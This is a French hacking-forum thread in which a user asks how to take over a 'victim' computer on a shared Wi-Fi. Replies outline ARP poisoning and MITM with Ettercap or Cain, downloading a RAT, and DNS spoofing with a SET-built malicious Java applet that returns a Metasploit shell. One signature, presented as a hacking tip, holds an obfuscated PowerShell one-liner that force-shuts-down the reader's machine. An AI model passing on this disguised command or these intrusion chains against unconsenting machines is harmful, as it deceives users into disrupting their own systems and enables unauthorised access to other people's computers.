Annonce

Réduire
Aucune annonce.

Questions sur le wifi ...

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Questions sur le wifi ...

    Bonjour.
    J'aimerais savoir ce qu'il est possible de faire à une machine connectée sur le même wifi que notre ordinateur Windows/Kali linux. Je sais qu'on peut l'éteindre avec le CMD mais j'aimerais aller plus loin si possible. Le mieux serais de pouvoir prendre le contrôle de l'ordinateur "victime" mais n'importe quoi d'autre m'intéresse.
    Merci, j'espère que j'ai été clair.

  • #2
    Bonjour,

    T'as essayé par magie ?

    Dans tous les cas, il te faudra les droits autorisés par la victime... La commande qui t'intéresses est sans doute net rpc.

    Commentaire


    • #3
      Envoyé par fred Voir le message
      Bonjour,

      T'as essayé par magie ?

      Dans tous les cas, il te faudra les droits autorisés par la victime... La commande qui t'intéresses est sans doute net rpc.
      Bonne idée. la magie !!! Je go essayer ! Non plus sérieusement merci j'aime vraiment bien ce forum
      A plus !

      Commentaire


      • #4
        À partir du moment où tu es sur un réseau avec d'autre machines, tu peux scanner leur port, rechercher des vulns sur des OS obsolète etc. Tout ce qui est pentest à partir du réseau quoi.
        Sinon tu peux aussi regarder du côté des attaques MITM (man in the middle), j'avais récemment vu, au travers d'un tool Android qu'on pouvait forcer le téléchargement de fichier arbitraire (en gros lorsqu'un client du réseau télécharge un fichier, le fichier est remplacé par celui de ton choix, possiblement un malware).

        J'ai plus le nom du tool en tête mais renseigne toi, tu devrais pouvoir trouver des techniques pour desktop


        Suivre Hackademics: Twitter, Google+, Facebook.

        Commentaire


        • #5
          Merci beaucoup, je vais regarder ça !

          Commentaire


          • #6
            salut à tous
            ma preocupation est la suivante, comment savoir si quelqu'un est connecté sur mes comptes reseaux sociaux ( facebook, messenger, gmail)
            merci

            Commentaire


            • #7
              Envoyé par Asbill Voir le message
              salut à tous
              ma preocupation est la suivante, comment savoir si quelqu'un est connecté sur mes comptes reseaux sociaux ( facebook, messenger, gmail)
              merci
              http://www.imore.com/think-someone-s...t-facebook-ios

              Commentaire


              • #8
                Envoyé par _47 Voir le message
                Sinon tu peux aussi regarder du côté des attaques MITM (man in the middle)
                J'ai regardé, c'est exactement ce qu'il me faut ! Merci beaucoup !
                Dernière modification par Krypta, 08 avril 2017, 12h30.

                Commentaire


                • #9
                  Le MITM ne sert pas a prendre le contrôle de la machine victime, au pire tu peux telecharger un RAT si tu veux vraiment prendre le total contrôle de la machine il y en a plein sur le web (plus ou moins dur a trouver, et une chance que ce que tu telecharge ait un virus aussi mais a tes risques et périls)

                  Mais je te conseille pour commencer a apprendre les bases de internet et de ses failles, je pense que tu vas galérer a ouvrir les ports et tout si tu commence direct par le RAT.
                  Je te conseille de commencer a comprendre les bases du hacking root-me(https://www.root-me.org/) est un très bon site pour débuter.

                  Commentaire


                  • #10
                    Documente toi sur "ARP cache poisoning", super lorsque tu es sur le même LAN dans ton cas le Wi-Fi.
                    Pour l'app android tu as 'network spoofer', sur windows 'cain' fait l'affaire et Etthercap sur kali.
                    Trust your technolust

                    Commentaire


                    • #11
                      Envoyé par ssh Voir le message
                      Documente toi sur "ARP cache poisoning", super lorsque tu es sur le même LAN dans ton cas le Wi-Fi.
                      Pour l'app android tu as 'network spoofer', sur windows 'cain' fait l'affaire et Etthercap sur kali.
                      "L'ARP cache poisoning" est maintenant devenue obsolète avec l'arrivé du NDP dans l'IPV6. C'est une vielle technique de MITM qui tend a disparaître.

                      https://en.wikipedia.org/wiki/Neighb...overy_Protocol
                      http://www.rfc-base.org/rfc-4861.html

                      Commentaire


                      • #12
                        Ça ne me rajeunit pas, merci pour le rafraichissement
                        Trust your technolust

                        Commentaire


                        • #13
                          Envoyé par Nilrem Voir le message

                          "L'ARP cache poisoning" est maintenant devenue obsolète avec l'arrivé du NDP dans l'IPV6. C'est une vielle technique de MITM qui tend a disparaître.

                          https://en.wikipedia.org/wiki/Neighb...overy_Protocol
                          http://www.rfc-base.org/rfc-4861.html
                          Le temps qu'on ai de l'IPV6 sur la majorité des infras LAN (si ça arrive), on sera tous les deux à la retraite xD
                          A mon sens, l'ARP cache poisoning a encore de beaux jours devant lui et est très loin d'être une forme d'attaque obsolète
                          Des mécanismes de protection existent déjà (niveau configuration de switch, pas protocole) et ne sont que rarement mis en place.
                          Hack like a pro :
                          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                          Commentaire


                          • #14
                            Je travaille sur Procurve/Comware et rare sont les clients qui 'durcissent' les configurations des switchs...
                            La dernière fois que j'ai joué avec l'ARP ne remonte pas si loin que ça, 2-3 ans dans un Hôtel

                            Trust your technolust

                            Commentaire


                            • #15
                              Salut crypta !

                              Pour prendre le "controle" d'une machine sur ton réseau
                              Spoof DNS + applet java malveillant devrais faire l'affaire.

                              Ta config n'est pas préciser dans ton profil, utilise tu Windows ou Linux ?

                              Si tu est sous Linux ( ce qui est grandement conseiller ) tu as
                              Ettercap, SEToolkit (SET), et metasploit (MSF) avec les quelles tu pourras mettre facilement ca en place..

                              ( En gros tu va redigirer le PC CIBLES vers une page malveillant ( DNS SPOOF via ettercap) que SET auras crée pour toi et quand ta "victime" surf ca lui demande d'installer l'appelt java et ca te retourne un shell (MSF) )

                              L'appelt java est le plus simple mais aussi le plus "grillé" tu pourrais par exemple aussi utiliser beef-xss pour lancer un "browser_pwn" pour eviter l'instalation de java..


                              Si non il reste tjr la bonne vielle methode comme a dit _47 :

                              À partir du moment où tu es sur un réseau avec d'autre machines, tu peux scanner leur port, rechercher des vulns sur des OS obsolète etc. Tout ce qui est pentest à partir du réseau quoi.
                              .


                              >Pour ca aussi il te faudras utiliser Metasploit, Nmap, Voir un scanner de vuln dans un second temps ( Nessus ? Openvas ? )

                              >Tu peu aussi te renseigner sur les services et leurs versions ( nmap -sV pour connaitre la versions des services)
                              Et ensuite sur internet ( exploit DB ou autres ) pour savoir si la versions et vulnerable.

                              Si la machine est un simple "Pc perso" peu de services devrais tourner dessus.. c'est pourquoi je tes en premiers orienter vers une attaque de type DNS spoof.


                              Link nous ta config ( OS principalement ) et les conditions exacte dans les quelles tu te trouve ( config réseau routeur ? switch ? répéteur ? (hotspot ? box perso ?) Os de la machine cible ? et utilisation de l'autre machine ? un humain l'utilise phisiquement ? ) pour pouvoir t'orienter vers tel ou tel techniques !



                              Tout ca pour une utilisation sur TON PROPRE réseau biensûr !
                              Amicalement, Unamed
                              Dernière modification par Unamed, 12 mai 2017, 19h32.
                              "Please do not use in military or secret service, or for illegal purposes."

                              Commentaire

                              Chargement...
                              X